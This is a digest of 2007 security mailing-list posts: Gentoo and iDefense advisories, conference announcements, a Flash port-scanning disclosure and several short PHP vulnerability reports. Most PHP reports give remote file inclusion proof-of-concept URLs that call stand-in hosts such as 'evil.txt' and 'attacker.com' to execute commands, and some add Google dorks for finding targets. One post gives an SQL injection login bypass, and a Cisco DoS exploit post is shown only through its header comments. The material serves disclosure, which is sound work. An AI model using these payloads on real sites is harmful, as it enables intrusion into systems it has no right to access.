[ GLSA 200708-04 ] ClamAV: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200708-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ClamAV: Denial of Service Date: August 09, 2007 Bugs: #185013 ID: 200708-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in ClamAV, allowing for a Denial of Service. Background == ClamAV is a GPL virus scanner. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav < 0.91 >= 0.91 Description === Metaeye Security Group reported a NULL pointer dereference in ClamAV when processing RAR archives. Impact == A remote attacker could send a specially crafted RAR archive to the clamd daemon, resulting in a crash and a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.91" References == [ 1 ] CVE-2007-3725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3725 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200708-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpwwNzBDdE81.pgp Description: PGP signature
Re: TS-2007-002-0: BlueCat Networks Adonis root Privilege Access
BlueCat Networks acknowledges the existence of this issue and our testing confirms that this can allow a Proteus Administrator to write arbitrary data using TFTP to an Adonis system and potentially damage or compromise it. This issue is the result of data validation errors in Proteus with respect to TFTP and can only be exploited by users with administrative privileges to the Proteus Admin Interface and sufficient access rights. Without authenticated access to the Proteus Admin Interface, this vulnerability cannot be exploited, and we therefore consider it a minor security issue. BlueCat Networks will be fixing this issue in an update to Proteus that will be made available shortly. To prevent exploitation of this issue, BlueCat Networks recommends that customers restrict access to the TFTP services on Proteus through the Access Rights menu. This can be done at two levels within the product: 1. At a configuration level by changing the access for TFTP Objects within the configuration (TFTP File, TFTP Folder and TFTP Group) to Hide or View privileges. 2. At the TFTP Group level by changing the access for TFTP Objects within the group (TFTP File and TFTP Folder) to Hide or View privileges. Kindest regards, BlueCat Networks Security
Re: [ELEYTT] 3SIERPIEN2007
your mail looks like this... http://seclists.org/fulldisclosure/2007/Jul/0288.html http://seclists.org/fulldisclosure/2007/Jul/0290.html you only put your ayes on the status bar, but the data URL scheme address bar spoofing on firefox isn't your discovering
Join us at OWASP Mumbai Meet : 6th September 2007
OWASP Mumbai joins in celebrating OWASP Live 0. OWASP Live 0 is Day of Worldwide OWASP One Day Conferences. Block your calendar on 6th September 2007 to join us on the event. Registrations for the event are FREE !! Interested in Speaking / Sharing your thoughts?? The topic of the event will be on "Privacy in the 21st Century", so all talks should be related to it (we should be addressing the Web Application side of Privacy (for example what happens to Privacy with SQL Injection, XSS and issues like pdp's Snoop) Send a mail to dharmeshmm at mastek dot com to confirm your presentation for the event. Interested in Sponsoring?? Send a mail to dharmeshmm at mastek dot com or call at +91 98670 75327 to understand the sponsorship details. Got MORE !! Ideas for the Event ?? Quickly write back to dharmeshmm at mastek dot com or call at +91 98670 75327 to share and make this a successful meet !! Details at: http://www.owasp.org/index.php/Mumbai#Theme_:_Privacy_in_21st_Century Please feel free to share this information to your colleagues to share and gain maximum information.
FinDix Remote File Inclusion Vulnerability
FinDix Remote File Inclusion Vulnerability --- Script : FinDix Site: http://ctw-design.com/styldiv/FindNix.zip Founder : Rizgar Contact : [EMAIL PROTECTED] Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :] --- Okey now in the script found bug : Line : 34-35 /* * load page in content table */ if ($page == "") $page = "start.htm"; //* change to your start page content. /* PoC : http://www.site.com/findix/index.php?page=http://shell.txt?&cmd=id
iDefense Security Advisory 08.09.07: Hewlett-Packard OpenView Operations OVTrace Buffer Overflow Vulnerabilities
Hewlett-Packard OpenView Operations OVTrace Buffer Overflow Vulnerabilities iDefense Security Advisory 08.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 09, 2007 I. BACKGROUND OpenView Operations software is a suite of network management tools used to monitor events on, and evaluate the performance of, hosts on the network. The OVTrace component of this suite is used to log the actions being taken by the other components of the suite in order to debug any problems that may be occurring. More information can be found at the following link. http://h20229.www2.hp.com/products/ovowin/index.html II. DESCRIPTION Remote exploitation of multiple stack-based buffer overflow vulnerabilities in Hewlett-Packard Development Co.'s OpenView Operations for Windows OVTrace service may allow an attacker to execute arbitrary code with SYSTEM privileges. The vulnerabilities exist within functions responsible for handling requests. These functions take a string from the request and copy it into fixed-size stack buffers. Since the length has not been properly validated, this results in an exploitable stack-based buffer overflow. III. ANALYSIS Exploitation of these vulnerabilities results in arbitrary code execution with SYSTEM privileges. The OVTrace service, while not crucial to normal operations, is started by default. The OVTrace service is also present on systems that have only the management console installed as well as systems that have a full installation of the server and console installed. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in HP OpenView version A.07.50 for Windows, with all patches applied as of Jun 27, 2007. Previous versions may also be affected. V. WORKAROUND Employing firewalls to limit access to the affected service will mitigate exposure to these vulnerabilities. VI. VENDOR RESPONSE Hewlett-Packard Co. has addressed these vulnerabilities by releasing patches for all HP OpenView products that contain the Shared Trace Service component. For more information consult the following HP Support Documents; c01106515, c01109171, c01109584, c01109617, c01110576, c01110627, c0851, c01112038, c01114023, c01114156, c01115068 at the URLs shown below. http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01106515 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109171 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109584 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109617 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110576 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110627 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0851 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01112038 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114023 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114156 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01115068 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3872 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/12/2007 Initial vendor notification 07/13/2007 Initial vendor response 08/09/2007 Coordinated public disclosure IX. CREDIT The discoverer of these vulnerabilities wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
VNSECON07 Materials released
Hi ladies and gentlemen, I'm happy to announce the availability of my materials for my talk at VNSECON07 ( http://conf.vnsecurity.net/ ), Ho Chi Minh, Vietnam. You can find the intro and slides + the full-text paper at: https://www.securinfos.info/VNSECON2007 Covered topics: * usage, enhancement and exploit modules development for the Metasploit Framework * Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF eXploit Builder The last version of the presented tool "MSF eXploit Builder" should be released in few days at: https://www.securinfos.info/metasploit/MSF_XB.php Best regards Take care /JA -- The UNofficial French Metasploit's website: http://www.metasploit.fr smime.p7s Description: S/MIME Cryptographic Signature
Design flaw in AS3 socket handling allows port probing
Design flaw in AS3 socket handling allows port probing # Summary Due to a design flaw in ActionScript 3 socket handling, compiled Flash movies are able to scan for open TCP ports on any host reachable from the host running the SWF, bypassing the Flash Player Security Sandbox Model and without the need to rebind DNS. # Technical background In AS3 Adobe introduced a new socket-related event called SecurityErrorEvent. This event is always thrown when a Flash Player tries to connect to a socket that it is not allowed to connect to by policy. The problem with the SecurityErrorEvent is that it's thrown immediately when a Flash Player tries to connect to a closed TCP port. If a service is listening on that port the Flash Player writes the string "" and waits for response from the service. Nearly no TCP-service will respond to this request. We can assume the following: When trying to connect to a socket that the SWF is not allowed to and it doesn't get a SecurityErrorEvent within 2 seconds the port is most likely open. A new Flash player instance is used for every probed port because the Flash Player sends only one policy-file request per player per host per port. # Tested platforms Works on: * Windows XP SP2: Internet Explorer 6 / Flash Player 9.0.47.0 * Windows XP SP2: Firefox 2.0.0.5 / Flash Player 9.0.47.0 * Windows XP SP2: IE 7.0.5730.11 Flash Player 9.0.47.0 * Ubuntu Edgy: Firefox 2.0.0.5 / Flash Player 9.0.47.0 * Mac OSX 10.4.10: Safari 2.0.4 / Flash Player 9.0.47.0 * Mac OSX 10.4.10: Safari 3.0.2 / Flash Player 9.0.47.0 * Mac OSX 10.4.10: Firefox 2.0.0.6 / Flash Player 9.0.47.0 * Solaris 10 i86: Firefox 2.0.0.3 / Flash Player 9.0.47.0 Doesn't work as expected on: * Mac OSX 10.4.10: Opera 9.22 / Flash Player 9.0.47.0 # Known limitations * The Scanner does not work on services that close the TCP- Connection immediately after they receive Bytes that they don`t "understand". The port is reported as closed because the SecurityErrorEvent is thrown when the TCP-Connection is closed. * The Scanner does not always work as expected when scanning hosts located in the internet (e.g. google.com). This maybe happens due to stateful inspection firewalls that close the connections or long TCP-response times. # Disclosure Timeline * 2007/07/23: Problem discovery * 2007/07/24: PoC available * 2007/07/25: Vendor notification * 2007/08/09: Public demonstration at CCCamp # Possible Fixes Flash-Player Side (Adobe) * TOTALLY REMOVE the SecurityErrorEvent (it`s useless, it`s just harder to find errors with socketservers without the event) * Remove the SecurityErrorEvent in the Release-Players and keep it in the debug players * Make the SecurityErrorEvent behave EXACTLY the same for opened an closed ports User Side * Disable Flash * Only allow Flash from trusted sites * Downgrade Player to Version 8 # Links * Flex 2 Socket: http://livedocs.adobe.com/flex/2/langref/flash/ net/Socket.html * Flex 2 SecurityErrorEvent: http://livedocs.adobe.com/flex/2/ langref/flash/events/SecurityErrorEvent.html * Flash Player 9 Security white paper: http://www.adobe.com/go/ fp9_0_security * Settings Manager: http://www.macromedia.com/support/ documentation/en/flashplayer/help/settings_manager06.html # Live PoC scanner * http://scan.flashsec.org/ # Source Code * http://scan.flashsec.org/classes/Main.as (compile using Adobes Flex2 SDK) # Credits * David Neu [EMAIL PROTECTED] Problem-Discovery and PoC * fukami, SektionEins, http://sektioneins.de/
Shoutbox 1.0 Remote Command Execution Vulnerability
Shoutbox 1.0 Remote Command Execution Vulnerability --- Script : Shoutbox 1.0 Version : 1.0 Site: http://www.mapos-scripts.de Founder : Rizgar Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys) d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", "Shoutbox 1.0" --- include($root.'config.php'); include($root.'includes/dbconnect.php'); include($root.'includes/function.php'); POC http://www.site.com/shoutbox.php?root=http://evil.txt?&cmd=id eof.
File Uploader Version 1.1 Remote Command Execution Vulnerability
File Uploader Version 1.1 Remote Command Execution Vulnerability --- Script : File Uploader Version Version : 1.1 Site: http://www.mapos-scripts.de Founder : Rizgar Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys) d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", --- include($config["root_ordner"].'includes/function.php'); POC http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id http://www.site.com/path/datei.php?config[root_ordner]=http://shell.txt?&cmd=id EOF
Web News 1.1 Remote Command Execution Vulnerability
Web News 1.1 Remote Command Execution Vulnerability
---
Script : Web News
Version : 1.1
Site: http://www.mapos-scripts.de
Founder : Rizgar
Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) ,
ColdHackers(nice boys)
d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", "Web News 1.1 and 1.0"
---
";
exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');
$header = style('index_body','header');
echo $header;
?>
PoC
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id
http://www.site.com/path/news.php?config[root_ordner]=http://shell.txt?&cmd=id
http://www.site.com/path/feed.php?config[root_ordner]=http://shell.txt?&cmd=id
..
EOF
Bilder Uploader 1.3 Remote Command Execution Vulnerability
Bilder Uploader 1.3 Remote Command Execution Vulnerability --- Script : Bilder Uploader Version : 1.3 Site: http://www.mapos-scripts.de Founder : Rizgar Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys) d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", --- Okey, look at nice codes :) http://www.site.com/path/gruppen.php?config[root_ordner]=http://evil.txt?&cmd=id And others... bild.php feed.php mitglieder.php online.php profil.php .. .. .. Eof.
Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability
Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability --- Script : Mapos Bilder Galerie Version : 1.0 Site: http://www.mapos-scripts.de Founder : Rizgar Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys) d0rk: "Copyright (c) 2007 by Mapos-Scripts.de Version 1.0 (Login)", "Mapos Bilder Galerie Version 1.0" --- Okey, look at nice codes :) "; exit; } include($config["root_ordner"].'includes/dbconnect.php'); include($config["root_ordner"].'includes/function.php'); ?> PoC: http://www.site.com/path/index.php?config[root_ordner]=http://evil.txt?&cmd=id http://www.site.com/path/galerie.php?config[root_ordner]=http://evil.txt?&cmd=id http://www.site.com/path/anzagien.php?config[root_ordner]=http://evil.txt?&cmd=id .. .. .. Eof..
Gstebuch Version 1.5 Remote Command Execution Vulnerability
Gästebuch Version 1.5 Remote Command Execution Vulnerability
---
Script : Gästebuch Version
Version : 1.5
Site: http://www.mapos-scripts.de/downloads.php?download=11
Founder : Rizgar
Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack
Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my
heros :]
---
";
exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');
include($config["root_ordner"].'includes/captcha.php');
$header = style('index_body','header');
echo $header;
...
?>
PoC :
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id
Summercon 2007 Atlanta August 24 - 26
Summercon 2007, August 24 through 26. Wyndham Midtown Hotel Atlanta, GA http://www.summercon.org Summercon is the oldest of the hacker cons. It has been hosted insuch fine cities as St. Louis, Atlanta, Washington, D.C., and Amsterdam. The con audience is a wide mix from security professionals, military officals, socialists, hackers, parents, artists, etc... It is a social event with presentations to help get the conversations started. There is little attitude, lots to learn, and plenty of fun at Summercon; all in the name of hacking. Summercon is FREE this year! Pease buy a t-shirt to support the organizer's efforts. Scheduled Speakers: If you would like to speak, send an email to speakers@ s u m m e r con.org with information about what you would like to speak on. We are in the process of compiling the speaker list, but we still need more speakers. Hotel Information: Wyndham Midtown Hotel 125 10th Street NE Atlanta, GA 30309 +1 404-873-4800 See the website (summercon.org) for more information.
Cisco NHRP denial of service (cisco-sa-20070808-nhrp)
Hi, this exploit/DoS addresses the recent NHRP bug in Cisco IOS (CSCin95836 / cisco-sa-20070808-nhrp). The original advisory can be found here: http://www.cisco.com/en/US/products/products_security_advisory09186a008089963b.shtml Exploit/DoS: /**/ /**/ /* nhrp-dos - Copyright by Martin Kluge, <[EMAIL PROTECTED]> */ /**/ /* Feel free to modify this code as you like, as long as you include the */ /* above copyright statement. */ /**/ /* Please use this code only to check your OWN cisco routers. */ /**/ /* Cisco bug ID: CSCin95836 */ /**/ /* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used */ /* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA) */ /* subnetwork to determine the internetworking layer address and NBMA */ /* subnetwork addresses of the NBMA next hop towards the destination. */ /* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */ /* IPSEC. */ /**/ /* URLs: */ /* - [RFC2332/NHRP] http://rfc.net/rfc2332.html */ /* - [RFC1701/GRE]http://rfc.net/rfc1701.html */ /* - [DMVPNs with Cisco] http://www.cisco.com/en/US/tech/tk583/tk372/techno */ /*logies_white_paper09186a008018983e.shtml*/ /**/ /* This code was only tested on FreeBSD and Linux, no warranty is or will be */ /* provided. */ /**/ /* Vulnerable images (tested):*/ /**/ /* - c7100-jk9o3s-mz.123-12e.bin */ /* - c7200-jk8o3s-mz.122-40.bin */ /* - c3640-js-mz.122-15.T17.bin */ /* (and many other IOS versions on different platforms) */ /**/ /* Vulnerable configuration on cisco IOS: */ /**/ /* interface Tunnel0 */ /* ip address 10.0.0.1 255.255.255.128 */ /* no ip redirects */ /* no ip proxy-arp */ /* ip mtu 1464 */ /* ip nhrp authentication mysecret */ /* ip nhrp network-id 1000 */ /* ip nhrp map multicast dynamic */ /* ip nhrp server-only */ /* ip nhrp holdtime 30 */ /* tunnel source FastEthernet0/0 */ /* tunnel mode gre multipoint*/ /* tunnel key 123456789 */ /**/ /* This exploit works even if "ip nhrp authentication" is configured on the */ /* cisco router. You can also specify a GRE key (use 0 to disable this*/ /* feature) if the GRE tunnel is protected. You don't need to know the*/ /* NHRP network id (or any other configuration details, except the GRE key if */ /* it is set on the target router). */ /**/ /* NOTE: The exploit only seems to work, if a NHRP session between the target */ /* router and at least one client is established. */ /*
[ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
ECHO_ADV_83$2007 - [ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability - Author : M.Hasran Addahroni Date : August, 7 th 2007 Location : Australia, Sydney Web: http://advisories.echo.or.id/adv/adv83-K-159-2007.txt Critical Lvl : Dangerous Impact : System access Where : From Remote --- Affected software description: ~~~ Application : PhpHostBot version : <= 1.06 Vendor: http://www.idevspot.com/PhpHostBot.php Description : PhpHostBot is a webware PHP application which integrates with the popular Cpanel(WHM) web hosting control panel. PhpHostBot supports Paypal subscriptions, free web hosting, Subdomain and Reseller account setup and supports both dedicated server and Reseller web hosting companies --- Vulnerability: ~ Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled. Poc/Exploit: ~ http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil? Google Dork: ~~ "order?page=plan_show" Solution: ~~ - Edit the source code to ensure that input is properly verified. - Turn off register_globals - use the latest version Timeline: - 27 -07 - 2007 bug found - 4 - 08 - 2007 vendor contacted - 7 - 08 - 2007 advisory released --- Shoutz: ~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments) ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw ~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16 ~ [EMAIL PROTECTED] ~ #aikmel #e-c-h-o @irc.dal.net --- Contact: ~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: http://k-159.echo.or.id/ [ EOF ] --
[ GLSA 200708-03 ] libarchive (formerly named as bsdtar): Multiple pax Extension Header Vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200708-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libarchive (formerly named as bsdtar): Multiple pax Extension Header Vulnerabilities Date: August 08, 2007 Bugs: #184984 ID: 200708-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were found in libarchive (formerly named as app-archive/bsdtar), possibly allowing for the execution of arbitrary code or a Denial of Service. Background == libarchive is a library for manipulating different streaming archive formats, including certain tar variants, several cpio formats, and both BSD and GNU ar variants. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-arch/libarchive < 2.2.4>= 2.2.4 Description === CPNI, CERT-FI, Tim Kientzle, and Colin Percival reported a buffer overflow (CVE-2007-3641), an infinite loop (CVE-2007-3644), and a NULL pointer dereference (CVE-2007-3645) within the processing of archives having corrupted PaX extension headers. Impact == An attacker can trick a user or automated system to process an archive with malformed PaX extension headers into execute arbitrary code, crash an application using the library, or cause a high CPU load. Workaround == There is no known workaround at this time. Resolution == All libarchive or bsdtar users should upgrade to the latest libarchive version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-arch/libarchive-2.2.4" References == [ 1 ] CVE-2007-3641 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3641 [ 2 ] CVE-2007-3644 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3644 [ 3 ] CVE-2007-3645 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3645 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200708-03.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpZvZIi2plcl.pgp Description: PGP signature
Re: [ELEYTT] 4SIERPIEN2007
The isChecked vulnerability with the Advanced Searchbar has been patched/repaired in the newest version 3.33 http://www.advancedsearchbar.com/asbsetup.exe Gerald O'Dea Advanced Search Technologies, Inc.
[Aria-Security.net] SAS Hotel Management System SQL Injection
__ A R I A - S E CU R I T Y ___ SAS Hotel Management System SQL Injection http://www.sellatsite.com/sellatsite/hotel.asp Explanation: http://path/admin/admin.asp Username: anything' OR 'x'='x password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-security.net http://outlaw.Aria-Security.net/ [PERSONAL BLOG]
